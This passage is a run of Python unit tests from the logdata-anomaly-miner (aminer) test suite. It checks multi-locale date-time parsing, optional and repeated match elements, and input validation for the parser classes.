"/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 23:59:01: it still works" date = b"01.01 23:59:01" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1577923141, None) self.assertEqual(multi_locale_dtme.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. Check your settings!", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test15time_change_cest_cet(self): """Check if the time change from CET to CEST and vice versa work as expected.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"24.03.2018 11:40:00 CET: it still works" date = b"24.03.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521888000, None) data = b"25.03.2018 11:40:00 CEST: it still works" date = b"25.03.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521970800, None) data = b"27.10.2018 11:40:00 CEST: it still works" date = b"27.10.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540633200, None) data = b"28.10.2018 11:40:00 CET: it still works" date = b"28.10.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540723200, None) data = b"27.10.2018 11:40:00 EST: it still works" date = b"27.10.2018 11:40:00 EST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540658400, None) data = b"27.10.2018 11:40:00 PDT: it still works" date = b"27.10.2018 11:40:00 PDT" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540665600, None) data = b"27.10.2018 11:40:00 GMT: it still works" date = b"27.10.2018 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540640400, None) def test16same_timestamp_multiple_times(self): """Test if the MultiLocaleDateTimeModelElement can handle multiple same timestamps.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)]) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None) def test17date_before_unix_timestamps(self): """Check if timestamps before the unix timestamp are processed properly.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)]) data = b"01.01.1900 11:40:00: it still works" date = b"01.01.1900 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, -2208946800, None) def test18element_id_input_validation(self): """Check if element_id is validated.""" date_formats = [(b"%d.%m.%Y %H:%M:%S", None, None)] self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, "", date_formats) # empty element_id self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, None, date_formats) # None element_id self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, b"path", date_formats) # bytes element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, 123, date_formats) # integer element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, 123.22, date_formats) # float element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, True, date_formats) # boolean element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, {"id": "path"}, date_formats) # dict element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, ["path"], date_formats) # list element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, [], date_formats) # empty list element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, (), date_formats) # empty tuple element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, set(), date_formats) # empty set element_id is not allowed def test19date_formats_input_validation(self): """Check if date_format is validated and only valid values can be entered.""" allowed_format_specifiers = b"bdfHMmSsYz%" # check if allowed values do not raise any exception. format_specifiers = b"" for c in allowed_format_specifiers: format_specifiers += b"%" + str(chr(c)).encode() MultiLocaleDateTimeModelElement(self.id_, [(b"%" + str(chr(c)).encode(), None, None)]) # check if all allowed values can not be used together. An exception should be raised, because of multiple month representations # and %s with non-second formats. self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(format_specifiers, None, None)]) MultiLocaleDateTimeModelElement(self.id_, [(format_specifiers.replace(b"%m", b"").replace(b"%s", b""), None, None)]) MultiLocaleDateTimeModelElement(self.id_, [(format_specifiers.replace(b"%b", b"").replace(b"%s", b""), None, None)]) MultiLocaleDateTimeModelElement(self.id_, [(b"%s%z%f", None, None)]) for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""): self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%" + str(chr(c)).encode(), None, None)]) # test non-existent specifiers for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ": self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%" + str(chr(c)).encode(), None, None)]) # test multiple specifiers. % and z specifiers are allowed multiple times. MultiLocaleDateTimeModelElement(self.id_, [(b"%%%z%z", None, None)]) for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""): self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [( b"%" + str(chr(c)).encode() + b"%" + str(chr(c)).encode(), None, None)]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%z%f", None)]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"", None, None)]) # empty self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(None, None, None)]) # None self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [("", None, None)]) # string self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(123, None, None)]) # integer self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(123.22, None, None)]) # float self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(True, None, None)]) # boolean self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [({"id": "path"}, None, None)]) # dict self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(["path"], None, None)]) # list self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [([], None, None)]) # empty list self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [((), None, None)]) # empty tuple self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(set(), None, None)]) # empty set self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [[b"%d.%m.%Y %H:%M:%S", None, None]]) # list inst of tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [()]) # empty tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [tuple(b"%d.%m.%Y %H:%M:%S")]) # 1 tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None)]) # 2 tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None, None)]) # 4 tuple def test20time_zone_input_validation(self): """Check if time_zone is validated and only valid values can be entered.""" en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]) for dtme in multi_locale_dtme.date_time_model_elements: self.assertEqual(dtme.time_zone, timezone.utc) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)]) for tz in pytz.all_timezones: MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz), None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", b"", None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", "UTC", None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", 1, None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", 1.25, None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", True, None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", [timezone.utc], None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", {"time_zone": timezone.utc}, None)]) def test21text_locale_input_validation(self): """ Check if text_locale is validated and only valid values can be entered. An exception has to be raised if the locale is not installed on the system. """ MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8"))]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, "")]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, tuple("en_US.UTF-8"))]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, ("en_US", "UTF-8", "t"))]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, b"")]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, 1)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, 1.2)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, True)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, ["en_US", "UTF-8"])]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, {"en_US": "UTF-8"})]) def test22start_year_input_validation(self): """Check if start_year is validated.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], None) self.assertEqual(multi_locale_dtme.start_year, datetime.now().year) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], 2020) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], -630) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], "2020") self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], True) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], 1.25) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], [2020]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], {"key": 2020}) def test23max_time_jump_seconds_input_validation(self): """Check if max_time_jump_seconds is validated.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], None) self.assertEqual(multi_locale_dtme.max_time_jump_seconds, 86400) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 100000) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 1) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, -1) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 0) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, "1000") self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, True) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 1.25) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, { "key": 2020}) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, [1000]) def test24get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)]) data = b"07.02.2019 11:40:00: it still works" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/OptionalMatchModelElementTest.py000066400000000000000000000133221500476301700316730ustar00rootroot00000000000000import unittest from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class OptionalMatchModelElementTest(TestBase): """Unittests for the OptionalMatchModelElement.""" id_ = "optional" path = "path" fixed_id = "fixed" fixed_data = b"fixed data" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"fixed data string." value = self.fixed_data match_context = DummyMatchContext(data) fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) optional_match = OptionalMatchModelElement(self.id_, fixed_dme) match_element = optional_match.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [ fixed_dme.get_match_element("%s/%s" % (self.path, self.id_), DummyMatchContext(data))]) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" optional_match = OptionalMatchModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"" match_context = DummyMatchContext(data) match_element = optional_match.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, None, None) data = b"other fixed string" value = b"" match_context = DummyMatchContext(data) match_element = optional_match.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, None, None) def test3element_id_input_validation(self): """Check if element_id is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(ValueError, OptionalMatchModelElement, "", fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, None, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, b"path", fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, True, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, 123, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, 123.22, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, {"id": "path"}, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, ["path"], fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, [], fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, (), fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, set(), fixed_dme) def test4optional_element_input_validation(self): """Check if optional_element is validated.""" self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, "fdme1") self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, None) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, b"path") self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, True) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, 123) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, 123.22) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, ["path"]) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, []) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, ()) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, set()) def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = OptionalMatchModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"fixed data" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/ParserMatchTest.py000066400000000000000000000044141500476301700270510ustar00rootroot00000000000000import unittest from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class ParserMatchTest(TestBase): """Unittests for the ParserMatch.""" match_element = MatchElement("path", b"match_string", b"match_object", None) def test1get_match_element(self): """Test if get_match_element works properly.""" match = ParserMatch(self.match_element) self.assertEqual(match.get_match_element(), self.match_element) def test2get_match_dictionary(self): """Test if MatchElements with and without children are evaluated properly and if multiple calls are handled properly.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) parser_match = ParserMatch(root_element) dictionary = parser_match.get_match_dictionary() self.assertEqual(dictionary["root"], root_element) self.assertEqual(dictionary["a1"], a1) self.assertEqual(dictionary["a2"], a2) self.assertEqual(dictionary["a3"], a3) self.assertEqual(dictionary["b1"], b1) self.assertEqual(dictionary["b2"], b2) self.assertEqual(dictionary["b3"], b3) def test3match_element_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, ParserMatch, "string") self.assertRaises(TypeError, ParserMatch, None) self.assertRaises(TypeError, ParserMatch, b"path") self.assertRaises(TypeError, ParserMatch, 123) self.assertRaises(TypeError, ParserMatch, 123.22) self.assertRaises(TypeError, ParserMatch, True) self.assertRaises(TypeError, ParserMatch, {"id": "path"}) self.assertRaises(TypeError, ParserMatch, ["path"]) self.assertRaises(TypeError, ParserMatch, []) self.assertRaises(TypeError, ParserMatch, ()) self.assertRaises(TypeError, ParserMatch, set()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/RepeatedElementDataModelElementTest.py000066400000000000000000000353061500476301700327740ustar00rootroot00000000000000import unittest from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class RepeatedElementDataModelElementTest(TestBase): """Unittests for the RepeatedElementDataModelElement.""" id_ = "repeated" path = "path" fixed_id = "fixed" fixed_data = b"fixed data " def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) repeated_dme = RepeatedElementDataModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"fixed data string." value = b"fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data))]) data = b"fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/3" % (self.path, self.id_), DummyMatchContext(data)) ]) data = b"fixed data fixed data \nhere is some other string.\nfixed data fixed data " value = b"fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)) ]) def test2get_match_element_min_max_repeats(self): """This test case verifies the functionality of setting the minimal and maximal repeats.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) repeated_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=2, max_repeat=5) same_min_max_repeat_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=3, max_repeat=3) data = b"other data" match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data))]) data = b"fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/3" % (self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/3" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/4" % (self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(ValueError, RepeatedElementDataModelElement, "", fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, None, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, b"path", fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, True, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, 123, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, 123.22, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, {"id": "path"}, fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, ["path"], fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, [], fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, (), fixed_dme) self.assertRaises(TypeError, RepeatedElementDataModelElement, set(), fixed_dme) def test4repeated_element_input_validation(self): """Check if repeated_element is validated.""" self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, "string") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, None) self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, b"path") self.assertRaises(TypeError, RepeatedElementDataModelElement, self.id_, True) self.assertRaises(TypeError, RepeatedElementDataModelElement, 